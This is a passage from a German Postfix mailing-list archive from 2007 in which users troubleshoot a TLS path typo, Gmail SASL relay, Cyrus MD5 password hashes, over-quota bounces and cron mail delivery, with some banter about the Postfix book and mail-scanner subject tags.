<4732FB72.7090107@thoma.cc> Message-ID: <4481.79.214.195.187.1194524124.squirrel@mail.siebenwind.de> > er kann das file nicht öffnen !!! > Nov 8 12:30:21 localhost postfix/smtpd[30613]: warning: TLS library > problem: 30613:error:02001002:system library:fopen:No such file or > directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): > > Existieren eigentlich die ganzen Files ??? > > smtpd_tls_CAfile = /etc/postifx/ssl/smtpd.pem > smtpd_tls_cert_file = /etc/postfix/ssl/mail.crt > smtpd_tls_key_file = /etc/postfix/ssl/mail.key > > und achtung linux ist case sensitive !!!! > > was gibt ls -la /etc/postfix/ssl aus ??? > evtl. sind die zugriffsrechte nicht ausreichend !!! > > gruß > > > maximilian > Ich denke wohl das die Dateien da sind, auf so etwas wär ich auch gekommen ;) ... Linus-H1:~# ls -la /etc/postfix/ssl drwxr-xr-x 2 root root 4096 2007-11-08 11:40 . drwxr-xr-x 5 root root 4096 2007-11-08 12:00 .. -rw-r--r-- 1 root root 1749 2007-11-05 11:26 mail.crt -rw-r--r-- 1 root root 1679 2007-10-10 16:05 mail.key -rw-r--r-- 1 root root 2298 2007-03-01 14:33 smtpd.pem From mluser at rbmail.ch Thu Nov 8 13:19:25 2007 From: mluser at rbmail.ch (Andre Keller) Date: Thu, 08 Nov 2007 13:19:25 +0100 Subject: [Postfixbuch-users] Postfix und das Liebe TLS In-Reply-To: <4481.79.214.195.187.1194524124.squirrel@mail.siebenwind.de> References: <1397.79.214.195.187.1194507795.squirrel@mail.siebenwind.de> <20071108075329.GB3849@state-of-mind.de> <1581.79.214.195.187.1194509128.squirrel@mail.siebenwind.de> <20071108105354.GG9494@mail.incertum.net> <3912.79.214.195.187.1194521997.squirrel@mail.siebenwind.de> <4732FB72.7090107@thoma.cc> <4481.79.214.195.187.1194524124.squirrel@mail.siebenwind.de> Message-ID: <4732FECD.1060009@rbmail.ch> > > Ich denke wohl das die Dateien da sind, auf so etwas wär ich auch gekommen > ;) ... > wie siehts mit chroot aus? From brunhilde at siebenwind.de Thu Nov 8 13:26:11 2007 From: brunhilde at siebenwind.de (BruniGunde) Date: Thu, 8 Nov 2007 13:26:11 +0100 (CET) Subject: [Postfixbuch-users] Postfix und das Liebe TLS In-Reply-To: <4732FECD.1060009@rbmail.ch> References: <1397.79.214.195.187.1194507795.squirrel@mail.siebenwind.de> <20071108075329.GB3849@state-of-mind.de> <1581.79.214.195.187.1194509128.squirrel@mail.siebenwind.de> <20071108105354.GG9494@mail.incertum.net> <3912.79.214.195.187.1194521997.squirrel@mail.siebenwind.de> <4732FB72.7090107@thoma.cc> <4481.79.214.195.187.1194524124.squirrel@mail.siebenwind.de> <4732FECD.1060009@rbmail.ch> Message-ID: <4588.79.214.195.187.1194524771.squirrel@mail.siebenwind.de> Der Postfix läuft derzeit in keiner chroot Umgebung, daher sollte er die Dateien einfach einlesen können, Leserechte sind ja gesetzt für User, Group und Others. > >> >> Ich denke wohl das die Dateien da sind, auf so etwas wär ich auch >> gekommen >> ;) ... >> > wie siehts mit chroot aus? > -- From cite at incertum.net Thu Nov 8 13:45:20 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Thu, 8 Nov 2007 13:45:20 +0100 Subject: [Postfixbuch-users] Postfix und das Liebe TLS In-Reply-To: <3912.79.214.195.187.1194521997.squirrel@mail.siebenwind.de> References: <1397.79.214.195.187.1194507795.squirrel@mail.siebenwind.de> <20071108075329.GB3849@state-of-mind.de> <1581.79.214.195.187.1194509128.squirrel@mail.siebenwind.de> <20071108105354.GG9494@mail.incertum.net> <3912.79.214.195.187.1194521997.squirrel@mail.siebenwind.de> Message-ID: <20071108124520.GH9494@mail.incertum.net> * BrunIGunde wrote: > directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): > directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): > smtpd_tls_CAfile = /etc/postifx/ssl/smtpd.pem Vielleicht, wenn Du statt "postifx" dann "postfix" schreibst? Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #190: Cisco - Protokollhure. (unbekannt) From christian at bricart.de Thu Nov 8 13:47:58 2007 From: christian at bricart.de (Christian Bricart) Date: Thu, 8 Nov 2007 13:47:58 +0100 (CET) Subject: [Postfixbuch-users] Postfix und das Liebe TLS In-Reply-To: <4588.79.214.195.187.1194524771.squirrel@mail.siebenwind.de> References: <1397.79.214.195.187.1194507795.squirrel@mail.siebenwind.de> <20071108075329.GB3849@state-of-mind.de> <1581.79.214.195.187.1194509128.squirrel@mail.siebenwind.de> <20071108105354.GG9494@mail.incertum.net> <3912.79.214.195.187.1194521997.squirrel@mail.siebenwind.de> <4732FB72.7090107@thoma.cc> <4481.79.214.195.187.1194524124.squirrel@mail.siebenwind.de> <4732FECD.1060009@rbmail.ch> <4588.79.214.195.187.1194524771.squirrel@mail.siebenwind.de> Message-ID: <51743.80.87.162.117.1194526078.squirrel@aachalon.de> BruniGunde wrote: > Der Postfix läuft derzeit in keiner chroot Umgebung, daher sollte er die > Dateien einfach einlesen können, Leserechte sind ja gesetzt für User, > Group und Others. glaub ich (so) nicht (direkt) - zeig mal master.cf Christian From christian at bricart.de Thu Nov 8 13:49:05 2007 From: christian at bricart.de (Christian Bricart) Date: Thu, 8 Nov 2007 13:49:05 +0100 (CET) Subject: [Postfixbuch-users] Postfix und das Liebe TLS In-Reply-To: <20071108124520.GH9494@mail.incertum.net> References: <1397.79.214.195.187.1194507795.squirrel@mail.siebenwind.de> <20071108075329.GB3849@state-of-mind.de> <1581.79.214.195.187.1194509128.squirrel@mail.siebenwind.de> <20071108105354.GG9494@mail.incertum.net> <3912.79.214.195.187.1194521997.squirrel@mail.siebenwind.de> <20071108124520.GH9494@mail.incertum.net> Message-ID: <59305.80.87.162.117.1194526145.squirrel@aachalon.de> Stefan FÃ¶rster wrote: > * BrunIGunde wrote: >> directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): >> directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): >> smtpd_tls_CAfile = /etc/postifx/ssl/smtpd.pem > > Vielleicht, wenn Du statt "postifx" dann "postfix" schreibst? ui - jemand mit Brille.. ;-) SCNR Christian From brunhilde at siebenwind.de Thu Nov 8 13:58:19 2007 From: brunhilde at siebenwind.de (BruniGunde) Date: Thu, 8 Nov 2007 13:58:19 +0100 (CET) Subject: [Postfixbuch-users] Postfix und das Liebe TLS In-Reply-To: <59305.80.87.162.117.1194526145.squirrel@aachalon.de> References: <1397.79.214.195.187.1194507795.squirrel@mail.siebenwind.de> <20071108075329.GB3849@state-of-mind.de> <1581.79.214.195.187.1194509128.squirrel@mail.siebenwind.de> <20071108105354.GG9494@mail.incertum.net> <3912.79.214.195.187.1194521997.squirrel@mail.siebenwind.de> <20071108124520.GH9494@mail.incertum.net> <59305.80.87.162.117.1194526145.squirrel@aachalon.de> Message-ID: <4798.79.214.195.187.1194526699.squirrel@mail.siebenwind.de> > Stefan FÃ¶rster wrote: >> * BrunIGunde wrote: >>> directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): >>> directory:bss_file.c:122:fopen('/etc/postifx/ssl/smtpd.pem','r'): >>> smtpd_tls_CAfile = /etc/postifx/ssl/smtpd.pem >> >> Vielleicht, wenn Du statt "postifx" dann "postfix" schreibst? > > ui - jemand mit Brille.. ;-) > > SCNR > Christian > Das schlimme ist, ich habe auch eine Brille auf der Nase ^^ Ähm ja, Danke... Den Buchstabensalat geklärt und es funktioniert jetzt. Ich hätte mal die kompletten Pfade neu schreiben sollen als ich es zwischenzeitlich mit einem neuen Zertifikat probiert hatte. O-o Nunja, wäre das geklärt, vielen Dank für eure Hilfe. From postfixbuch-users at japantest.homelinux.com Thu Nov 8 15:21:27 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Thu, 08 Nov 2007 15:21:27 +0100 Subject: [Postfixbuch-users] smtp_sender_dependent_* + gmail In-Reply-To: <200711081249.58033.kildau-ml@gmx.de> References: <200711071104.37894.kildau-ml@gmx.de> <200711080921.05459.kildau-ml@gmx.de> <4732F043.3080703@japantest.homelinux.com> <200711081249.58033.kildau-ml@gmx.de> Message-ID: <47331B67.2060205@japantest.homelinux.com> Chris Cohen wrote: > On Thursday 08 November 2007 12:17:23 Sandy Drobic wrote: >>> Viele viele Fehlermeldungen und Zertifikategenerierungen später... >>> es funktioniert :) >>> Ich glaub, ich muss mich dann bei Gelegenheit mal in OpenSSL und >>> Zertifikate generell einlesen... >> Sehr schön, obwohl für das SENDEN keine Zertifikate erforderlich sind. Das >> funktioniert out-of-the-box, wenn Postfix mit Openssl-Unterstützung >> kompiliert ist (eigentlich immer). >> > > Ohne eigene Zertifikate hab' ich immer nur > > Nov 8 07:37:17 daisy postfix/smtp[8625]: certificate verification failed for > smtp.gmail.com: num=20:unable to get local issuer certificate > Nov 8 07:37:17 daisy postfix/smtp[8625]: certificate verification failed for > smtp.gmail.com: num=27:certificate not trusted > Nov 8 07:37:17 daisy postfix/smtp[8625]: certificate verification failed for > smtp.gmail.com: num=21:unable to verify the first certificate Diese Meldungen kommen, weil du den smtp_tls_loglevel auf 1 stehen hast. Postfix kann das Zertifikat nicht überprüfen, da du keine Zertifikate als vertrauenswürdig hinterlegt hast. Nichtsdestotrotz wird die TLS-Verbindung aufgebaut und funktioniert. > Nov 8 07:37:17 daisy postfix/smtp[8625]: warning: SASL authentication > failure: No worthy mechs found Das ist schon übler. Ich habe gerade getestet, dass smtp.gmail.com nur Plaintext-Mechanismen erlaubt (nach starttls). Wenn du also noplaintext in smtp_sasl_security_options hast, dann gibt es einen Mechanismus mehr, mit dem eine Authentifikation stattfinden kann. Welche Mechanismen sind den bei dir installiert? -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From kildau-ml at gmx.de Thu Nov 8 15:57:18 2007 From: kildau-ml at gmx.de (Chris Cohen) Date: Thu, 8 Nov 2007 15:57:18 +0100 Subject: [Postfixbuch-users] smtp_sender_dependent_* + gmail In-Reply-To: <47331B67.2060205@japantest.homelinux.com> References: <200711071104.37894.kildau-ml@gmx.de> <200711081249.58033.kildau-ml@gmx.de> <47331B67.2060205@japantest.homelinux.com> Message-ID: <200711081557.18413.kildau-ml@gmx.de> On Thursday 08 November 2007 15:21:27 Sandy Drobic wrote: > Chris Cohen wrote: > > On Thursday 08 November 2007 12:17:23 Sandy Drobic wrote: > >>> Viele viele Fehlermeldungen und Zertifikategenerierungen später... > >>> es funktioniert :) > >>> Ich glaub, ich muss mich dann bei Gelegenheit mal in OpenSSL und > >>> Zertifikate generell einlesen... > >> > >> Sehr schön, obwohl für das SENDEN keine Zertifikate erforderlich sind. > >> Das funktioniert out-of-the-box, wenn Postfix mit Openssl-Unterstützung > >> kompiliert ist (eigentlich immer). > > > > Ohne eigene Zertifikate hab' ich immer nur > > > > Nov 8 07:37:17 daisy postfix/smtp[8625]: certificate verification failed > > for smtp.gmail.com: num=20:unable to get local issuer certificate > > Nov 8 07:37:17 daisy postfix/smtp[8625]: certificate verification failed > > for smtp.gmail.com: num=27:certificate not trusted > > Nov 8 07:37:17 daisy postfix/smtp[8625]: certificate verification failed > > for smtp.gmail.com: num=21:unable to verify the first certificate > > Diese Meldungen kommen, weil du den smtp_tls_loglevel auf 1 stehen hast. > Postfix kann das Zertifikat nicht überprüfen, da du keine Zertifikate als > vertrauenswürdig hinterlegt hast. Nichtsdestotrotz wird die TLS-Verbindung > aufgebaut und funktioniert. > > > Nov 8 07:37:17 daisy postfix/smtp[8625]: warning: SASL authentication > > failure: No worthy mechs found > > Das ist schon übler. Ich habe gerade getestet, dass smtp.gmail.com nur > Plaintext-Mechanismen erlaubt (nach starttls). > > Wenn du also noplaintext in smtp_sasl_security_options hast, dann gibt es > einen Mechanismus mehr, mit dem eine Authentifikation stattfinden kann. > > Welche Mechanismen sind den bei dir installiert? > Ich nutze die cyrus-sasl libraries, kompiliert mit: -rwxr-xr-x 1 root root 825 2007-03-11 09:48 /usr/lib/sasl2/libanonymous.la -rwxr-xr-x 1 root root 813 2007-03-11 09:48 /usr/lib/sasl2/libcrammd5.la -rwxr-xr-x 1 root root 834 2007-03-11 09:48 /usr/lib/sasl2/libdigestmd5.la -rwxr-xr-x 1 root root 862 2007-03-11 09:48 /usr/lib/sasl2/libldapdb.la -rwxr-xr-x 1 root root 809 2007-03-11 09:48 /usr/lib/sasl2/liblogin.la -rwxr-xr-x 1 root root 804 2007-03-11 09:48 /usr/lib/sasl2/libntlm.la -rwxr-xr-x 1 root root 809 2007-03-11 09:48 /usr/lib/sasl2/libplain.la -rwxr-xr-x 1 root root 827 2007-03-11 09:48 /usr/lib/sasl2/libsasldb.la smtp_sasl_security_options hat als default noplaintext noanonymous? Dann lags wohl tatsächlich nur an der Änderung auf = noanonymous. -- Greetings Chris From thorsten-bln at gmx.net Thu Nov 8 16:26:01 2007 From: thorsten-bln at gmx.net (Thorsten) Date: Thu, 08 Nov 2007 16:26:01 +0100 Subject: [Postfixbuch-users] =?iso-8859-15?q?Aktuelle_Version_des_Buchs_ka?= =?iso-8859-15?q?ufen_oder_auf_die_neue_Auflage_im_M=E4rz_2008_warten_=3F?= Message-ID: <47332A89.8050607@gmx.net> Hallo, wird es in der nächsten Auflage des Postfix-Buches grundlegende Änderungen und Überarbeitungen geben, sodass ich mit dem Kauf bis März 2008 warten sollte. Oder kann ich mir getrost die Auflage von März 2004 kaufen ? Lieben Gruß Thorsten From ml at awinkelmann.de Thu Nov 8 18:32:24 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Thu, 8 Nov 2007 18:32:24 +0100 Subject: [Postfixbuch-users] Cyrus-Imap Login via Mysql MD5 (Hash) In-Reply-To: <008901c821f8$02d5c830$08815890$@de> References: <008901c821f8$02d5c830$08815890$@de> Message-ID: <200711081832.25131.ml@awinkelmann.de> On Donnerstag, 8. November 2007, mrg at unimx.de wrote: > Wie teile ich dem Systme nun mit, dass die Passwörter MD5 (Hash) in der > Datenbank sind. http://frost.ath.cx/software/cyrus-sasl-patches/ -- Andreas From mrg at unimx.de Thu Nov 8 19:38:31 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Thu, 8 Nov 2007 19:38:31 +0100 Subject: [Postfixbuch-users] Cyrus-Imap Login via Mysql MD5 (Hash) In-Reply-To: <200711081832.25131.ml@awinkelmann.de> References: <008901c821f8$02d5c830$08815890$@de> <200711081832.25131.ml@awinkelmann.de> Message-ID: <010101c82236$8ff5ad00$afe10700$@de> Danke für die Antwort, leider geht der Patch nur mit 2.1.19 und ich habe ein RPM 2.1.21 RPM installiert. Habe nun 2.1.19 mit Pacht kompiliert und dann ohne "make install" Nun einfach die neue libsasl2.so.2.0.19 ins /var/lib getan (symlinks noch angepasst) und nun geht es. Danke. Hoffe es tauchen keine Probleme auf da cyrus-sasl2.1.21 per RPM immer noch installiert ist und ich nur die LIB von libsasl2.so.2.0.21 nach libsasl2.so.2.0.19 ausgetauscht habe. In den Logs schein alles sauber. Danke soweit. PS: das Kompilieren war echt ein Krampf, nur Fehler. Musste ohne digetmd5 kompilieren (brauch ich aber eh nicht) und musste einen HEADER fixen: >When compiling with gcc (GCC) 4.0.1 20050727 on Fedora Core 4, you may notice the following error: > >client.c:64: error: static declaration of 'global_callbacks' follows non-static declaration >saslint.h:112: error: previous declaration of 'global_callbacks' was here > >This can be corrected by commenting out the offending line (saslint.h, line 122). GCC 4.0.1 performs advanced checking, exposing problems like this in the source. > > /* extern sasl_global_callbacks_t global_callbacks; */ Hinweis: Ach normale MD5 HASHs scheinen nicht zu gehen, aber zumindest Passwörter die ich mit crypt erstelle. Also nur (um in PHP zu sprechen): crypt($plainpass, $salt); // DIESES PASSWORT GEHT md5($plainpass); // DIESES PASSWORT GEHT NICHT Grüße Martin -----Ursprüngliche Nachricht----- Von: postfixbuch-users-bounces at listi.jpberlin.de [mailto:postfixbuch-users-bounces at listi.jpberlin.de] Im Auftrag von Andreas Winkelmann Gesendet: Donnerstag, 8. November 2007 18:32 An: postfixbuch-users at listi.jpberlin.de Betreff: Re: [Postfixbuch-users] Cyrus-Imap Login via Mysql MD5 (Hash) On Donnerstag, 8. November 2007, mrg at unimx.de wrote: > Wie teile ich dem Systme nun mit, dass die Passwörter MD5 (Hash) in der > Datenbank sind. http://frost.ath.cx/software/cyrus-sasl-patches/ -- Andreas -- _______________________________________________ Postfixbuch-users -- http://www.postfixbuch.de Heinlein Professional Linux Support GmbH Postfixbuch-users at listi.jpberlin.de https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users From brutus at iunius.org Thu Nov 8 21:07:00 2007 From: brutus at iunius.org (Andreas Krummrich) Date: Thu, 08 Nov 2007 21:07:00 +0100 Subject: [Postfixbuch-users] =?iso-8859-15?q?Mail_an_volle_Postf=E4cher_ab?= =?iso-8859-15?q?lehnen?= Message-ID: <47336C63.3090904@iunius.org> Hi, ich habe ein kleines Problem. Meine Schule verwendet Postfix mit Cyrus. Wenn das Postfach des Users voll (Over quota) ist, bleibt die Mail in der Warteschlange vom Postfix liegen und verstopft mir diese. Gibt es eine Möglichkeit, diese Mails abzulehnen? Hab leider nichts ergoogeln können. Gruß, Andreas From brutus at iunius.org Thu Nov 8 21:15:48 2007 From: brutus at iunius.org (Andreas Krummrich) Date: Thu, 08 Nov 2007 21:15:48 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mail_an_volle_Postf=E4cher_abl?= =?iso-8859-1?q?ehnen?= In-Reply-To: <47336C63.3090904@iunius.org> References: <47336C63.3090904@iunius.org> Message-ID: <47336E74.6070202@iunius.org> Eines hab ich noch vergessen, was vielleicht relevant sein könnte. Die Quotas sind in /var/lib/cyrus/quota für jede einzelne Mailbox bzw. User definiert. Gruß, Andreas. Andreas Krummrich schrieb: > Hi, > > ich habe ein kleines Problem. > > Meine Schule verwendet Postfix mit Cyrus. Wenn das Postfach des Users > voll (Over quota) ist, bleibt die Mail in der Warteschlange vom Postfix > liegen und verstopft mir diese. > > Gibt es eine Möglichkeit, diese Mails abzulehnen? Hab leider nichts > ergoogeln können. > > Gruß, > Andreas > From Jammer at gmx.de Thu Nov 8 21:39:57 2007 From: Jammer at gmx.de (Jan Scholten) Date: Thu, 8 Nov 2007 21:39:57 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mail_an_volle_Postf=E4cher_abl?= =?iso-8859-1?q?ehnen?= In-Reply-To: <47336E74.6070202@iunius.org> References: <47336C63.3090904@iunius.org> <47336E74.6070202@iunius.org> Message-ID: <1622810317.20071108213957@gmx.de> Vielleicht in der /etc/imapd.conf lmtp_overquota_perm_failure: yes ?? Dann gibt es ne 5XX und ne error an den Absender. > Eines hab ich noch vergessen, was vielleicht relevant sein könnte. > Die Quotas sind in /var/lib/cyrus/quota für jede einzelne Mailbox bzw. > User definiert. > Gruß, > Andreas. > Andreas Krummrich schrieb: >> Hi, >> >> ich habe ein kleines Problem. >> >> Meine Schule verwendet Postfix mit Cyrus. Wenn das Postfach des Users >> voll (Over quota) ist, bleibt die Mail in der Warteschlange vom Postfix >> liegen und verstopft mir diese. >> >> Gibt es eine Möglichkeit, diese Mails abzulehnen? Hab leider nichts >> ergoogeln können. >> >> Gruß, >> Andreas >> -- I'm not a real nerd, I just look, sound, and smell like one. Mit freundlichen Grüßen Jan Scholten mailto:Jammer at gmx.de From brutus at iunius.org Thu Nov 8 21:49:06 2007 From: brutus at iunius.org (Andreas Krummrich) Date: Thu, 08 Nov 2007 21:49:06 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mail_an_volle_Postf=E4cher_abl?= =?iso-8859-1?q?ehnen?= In-Reply-To: <1622810317.20071108213957@gmx.de> References: <47336C63.3090904@iunius.org> <47336E74.6070202@iunius.org> <1622810317.20071108213957@gmx.de> Message-ID: <47337642.2000800@iunius.org> Hi, danke für die schnelle Antwort! Die Option gab es leider noch nicht beim Cyrus 1 :-( Ist leider noch ein Überbleibsel von der alten Woody Installation. Gibt es vielleicht eine andere Möglichkeit? Gruß, Andreas Jan Scholten schrieb: > Vielleicht in der /etc/imapd.conf > lmtp_overquota_perm_failure: yes > ?? > Dann gibt es ne 5XX und ne error an den Absender. > > >> Eines hab ich noch vergessen, was vielleicht relevant sein könnte. >> > > >> Die Quotas sind in /var/lib/cyrus/quota für jede einzelne Mailbox bzw. >> User definiert. >> > > >> Gruß, >> Andreas. >> > > >> Andreas Krummrich schrieb: >> >>> Hi, >>> >>> ich habe ein kleines Problem. >>> >>> Meine Schule verwendet Postfix mit Cyrus. Wenn das Postfach des Users >>> voll (Over quota) ist, bleibt die Mail in der Warteschlange vom Postfix >>> liegen und verstopft mir diese. >>> >>> Gibt es eine Möglichkeit, diese Mails abzulehnen? Hab leider nichts >>> ergoogeln können. >>> >>> Gruß, >>> Andreas >>> >>> > > > > > From Jammer at gmx.de Thu Nov 8 21:54:27 2007 From: Jammer at gmx.de (Jan Scholten) Date: Thu, 8 Nov 2007 21:54:27 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mail_an_volle_Postf=E4cher_abl?= =?iso-8859-1?q?ehnen?= In-Reply-To: <47337642.2000800@iunius.org> References: <47336C63.3090904@iunius.org> <47336E74.6070202@iunius.org> <1622810317.20071108213957@gmx.de> <47337642.2000800@iunius.org> Message-ID: <1246938072.20071108215427@gmx.de> Phh ka.. ich benutz kein so altes Cyrus.. > Hi, > danke für die schnelle Antwort! > Die Option gab es leider noch nicht beim Cyrus 1 :-( Ist leider noch ein > Überbleibsel von der alten Woody Installation. > Gibt es vielleicht eine andere Möglichkeit? > Gruß, > Andreas > Jan Scholten schrieb: >> Vielleicht in der /etc/imapd.conf >> lmtp_overquota_perm_failure: yes >> ?? >> Dann gibt es ne 5XX und ne error an den Absender. >> >> >>> Eines hab ich noch vergessen, was vielleicht relevant sein könnte. >>> >> >> >>> Die Quotas sind in /var/lib/cyrus/quota für jede einzelne Mailbox bzw. >>> User definiert. >>> >> >> >>> Gruß, >>> Andreas. >>> >> >> >>> Andreas Krummrich schrieb: >>> >>>> Hi, >>>> >>>> ich habe ein kleines Problem. >>>> >>>> Meine Schule verwendet Postfix mit Cyrus. Wenn das Postfach des Users >>>> voll (Over quota) ist, bleibt die Mail in der Warteschlange vom Postfix >>>> liegen und verstopft mir diese. >>>> >>>> Gibt es eine Möglichkeit, diese Mails abzulehnen? Hab leider nichts >>>> ergoogeln können. >>>> >>>> Gruß, >>>> Andreas >>>> >>>> >> >> >> >> >> -- Now weary traveller, rest your head. For just like me, you're utterly dead. Mit freundlichen Grüßen Jan Scholten mailto:Jammer at gmx.de From brutus at iunius.org Thu Nov 8 22:10:46 2007 From: brutus at iunius.org (Andreas Krummrich) Date: Thu, 08 Nov 2007 22:10:46 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Mail_an_volle_Postf=E4cher_abl?= =?iso-8859-1?q?ehnen?= In-Reply-To: <1246938072.20071108215427@gmx.de> References: <47336C63.3090904@iunius.org> <47336E74.6070202@iunius.org> <1622810317.20071108213957@gmx.de> <47337642.2000800@iunius.org> <1246938072.20071108215427@gmx.de> Message-ID: <47337B56.9030802@iunius.org> Hmm, schade ;-) Gibt es vielleicht ne Möglichkeit da was am Postfix zu drehen? Gruß, Andreas Jan Scholten schrieb: > Phh ka.. ich benutz kein so altes Cyrus.. > > > >> Hi, >> > > >> danke für die schnelle Antwort! >> > > >> Die Option gab es leider noch nicht beim Cyrus 1 :-( Ist leider noch ein >> Überbleibsel von der alten Woody Installation. >> > > >> Gibt es vielleicht eine andere Möglichkeit? >> > > >> Gruß, >> Andreas >> > > >> Jan Scholten schrieb: >> >>> Vielleicht in der /etc/imapd.conf >>> lmtp_overquota_perm_failure: yes >>> ?? >>> Dann gibt es ne 5XX und ne error an den Absender. >>> >>> >>> >>>> Eines hab ich noch vergessen, was vielleicht relevant sein könnte. >>>> >>>> >>> >>> >>>> Die Quotas sind in /var/lib/cyrus/quota für jede einzelne Mailbox bzw. >>>> User definiert. >>>> >>>> >>> >>> >>>> Gruß, >>>> Andreas. >>>> >>>> >>> >>> >>>> Andreas Krummrich schrieb: >>>> >>>> >>>>> Hi, >>>>> >>>>> ich habe ein kleines Problem. >>>>> >>>>> Meine Schule verwendet Postfix mit Cyrus. Wenn das Postfach des Users >>>>> voll (Over quota) ist, bleibt die Mail in der Warteschlange vom Postfix >>>>> liegen und verstopft mir diese. >>>>> >>>>> Gibt es eine Möglichkeit, diese Mails abzulehnen? Hab leider nichts >>>>> ergoogeln können. >>>>> >>>>> Gruß, >>>>> Andreas >>>>> >>>>> >>>>> >>> >>> >>> >>> > > > > > From w.flamme at web.de Thu Nov 8 22:46:35 2007 From: w.flamme at web.de (Werner Flamme) Date: Thu, 08 Nov 2007 22:46:35 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Aktuelle_Version_des_Buchs_kau?= =?iso-8859-1?q?fen_oder_auf_die_neue_Auflage_im_M=E4rz_2008_warten_=3F?= In-Reply-To: <47332A89.8050607@gmx.net> References: <47332A89.8050607@gmx.net> Message-ID: <473383BB.7040904@web.de> Thorsten schrieb: > Hallo, > > wird es in der nächsten Auflage des Postfix-Buches grundlegende > Änderungen und Überarbeitungen geben, sodass ich mit dem Kauf bis März > 2008 warten sollte. Oder kann ich mir getrost die Auflage von März 2004 > kaufen ? > > Lieben Gruß > Thorsten Hallo Thorsten, ich warte... Die aktuelle postfiksch-Version hat doch ein paar Feinheiten, die in der alten Auflage nicht vorhanden sind, weil es sie damals noch gar nicht gab. Habe die 1. Auflage und dann - als die 3. nicht kommen wollte - die schwarze Bibel von Ralf & Patrick gekauft. Aber wenn Weihnachten 2008 die 3. Auflage von Peers Buch angekündigt wird, werde ich mich vormerken lassen ;-) Aber vielleicht fork()t Peer nochmal[1], dann dauert's länger 8-) Gruß Werner [1] http://www.linuxhowtos.org/System/man_baby.htm From postfixbuch at cboltz.de Fri Nov 9 01:33:55 2007 From: postfixbuch at cboltz.de (Christian Boltz) Date: Fri, 9 Nov 2007 01:33:55 +0100 Subject: [Postfixbuch-users] Mailscanner In-Reply-To: <200711072311.52030.p.heinlein@heinlein-support.de> References: <4732124E.4010206@it-steiner.com> <200711072311.52030.p.heinlein@heinlein-support.de> Message-ID: <200711090133.56273@tux.boltz.de.vu> Hallo Peer, hallo Leute, Am Mittwoch, 7. November 2007 schrieb Peer Heinlein: > Am Mittwoch, 7. November 2007 schrieb Steiner Andreas: > > Jedoch sollte laut dem howto das ich habe dieser text auch beim > > senden eines mails angehängt werden, leider > > bleibt das bei mir aus. > > Nicht "leider". > > Zum Glück. Genau ;-) > (Sorry, ich würde Dir trotzdem helfen, weiß es aber wirklich nicht, > da ich mit Mailscanner nix zu tun habe. Aber bitte: Es gibt nichts > sinnloseres also diese Pseudosicherheitstexte, die im Zweifelsfall > sogar kontraproduktiv sind und die Sicherheit gefährden.) Ich hätte noch eine Steigerungsform anzubieten: Man packe das ganze in die Betreffzeile, z. B. ['securiQ.Watchdog': ueberprueft, O.K.] (AFAIK steckt Lotus Bloats und ein Domino-Server dahinter...) Die Antworten auf eine solche Mail sind dann automatisch per Definition virenfrei - steht ja schon im Betreff ;-) (Spaß am Rand: Ich habe mal heute in einer Antwort an denjenigen die Betreffzeile geändert auf "...: ist in Urlaub" und warte jetzt gespannt ab, wie das ankommt...) Noch lustiger finde ich die Hinweise meiner Sparkasse, dass von einer text/plain Mail ohne Anhang, über Mailman verschickt, der Anhang abgeschnitten wurde. Die Betreffzeile ist dadurch noch lustiger (steht so in der Zustellbestätigung): [Virus checked=]['Virus Inst. 021E:' checked] ['WD SPK SUEW': Nicht zulässiger Anhang] Ja, ich bin mir sicher, dass die Mail trotz Mailman keinen Anhang hatte. Der Autoreply mit der Zustellbestätigung (WTF?! [1]) trägt dann das nette Subject 'iQ.Suite': Notification [Virus checked] was IMHO auf einen nicht allzu hohen IQ schließen lässt ;-) Der Hinweis, was man bei der Sparkasse alles _nicht_ per Mail erledigen kann, ist dann auch schon fast bildschirmfüllend. Wenig überraschend: Auch die Sparkasse spielt gern mit Dominosteinen. Hmm, da fällt mir gerade auf, dass die Zustellbestätigung von Zustellbestaetigung at sparkasse-suew.de kommt [2]. Ob ich mal etwas BOFH spielen sollte? *g* Gruß Christian Boltz [1] - Was soll das? Wenn ich für all meine Mails eine Zustellbestätigung als Antwort bekäme, würde mein Postfach überquellen - ein Autoreply auf eine via Mailman verschickte Mail (Procedere:bulk oder so) ist nicht wirklich schlau - weitere Gründe und Rants bitte --> hier <-- einfügen [2] ja, auch der Return-Path ist darauf gesetzt - das Ding ist also bounce-fähig ;-) -- Ich hatte hatte wohl in einem *spät-nach-mitternächtlichen* Sicherheitswahn alle Files in /bin auf 700 root:root gesetzt. [denkt euch hier eines dieser smileys das mit dem kopf gegen die Wand hämmert] [Maik Bader in suse-linux] From sven at root2.schroederhost.de Fri Nov 9 11:01:49 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Fri, 09 Nov 2007 11:01:49 +0100 Subject: [Postfixbuch-users] Cron mailt nicht Message-ID: <4734300D.2050409@root2.schroederhost.de> Hallo! Seid einiger Zeit bekomme ich keine Mails mehr von Cron, sonst alles ist ok. Hier meine Crontab: SHELL=/bin/bash PATH=/sbin:/bin/:/usr/sbin/:/usr/bin MAILTO=root 0 1 * * * /usr/local/sbin/sync.sh 0 23 * * * /usr/bin/dpkg --get-selections > /etc/packagelist && /bin/chmod 0600 /etc/packagelist */5 * * * * echo test Das Cron.log: Nov 9 11:00:01 server /USR/SBIN/CRON[32176]: (root) CMD (echo 